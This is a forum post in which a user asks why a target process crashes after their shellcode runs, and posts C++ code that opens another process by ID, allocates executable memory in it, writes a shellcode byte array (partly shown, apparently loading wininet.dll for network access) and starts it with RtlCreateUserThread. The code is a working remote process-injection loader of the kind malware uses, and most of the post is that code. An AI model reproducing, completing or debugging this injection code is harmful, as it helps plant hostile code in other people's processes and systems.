
Thread: RtlCreateUserThread best practices

  1. #1

    Question RtlCreateUserThread best practices

    Hi guys
    I have a shellcode; I used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
    The code is executed successfully, but then the process crashes with a C000005 exception.

    I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
    I also tried calling ExitThread.
    How can I avoid crashing the process?
    Thanks
    Here is the code
    Code:
    RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread");
        cin >>pid;
     
        HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid);
    
    	HANDLE code=VirtualAllocEx(hProc, NULL, 508 ,MEM_COMMIT , PAGE_EXECUTE_READWRITE);
    	void * hex =	"\xe9\xff\x00\x00\x00\xe8\x1b\x01"
    "\x00\x00\x77\x69\x6e\x69\x6e\x65"
    "\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....
    DWORD sizeofHex = 509;
    	WriteProcessMemory(hProc,code,hex,sizeofHex,NULL);
    	__try {
    		RtlCreateUserThread(hProc,NULL,false,0,0,0, code,0,&hThd,&cid);
    	}
    	__except (GetExceptionCode() ){
    		return -1;
    	}
        WaitForSingleObject(hThd,INFINITE);
     
        CloseHandle(hThd);
        CloseHandle(hProc);
    Last edited by capadleman; June 18th, 2013 at 12:59. Reason: added the source code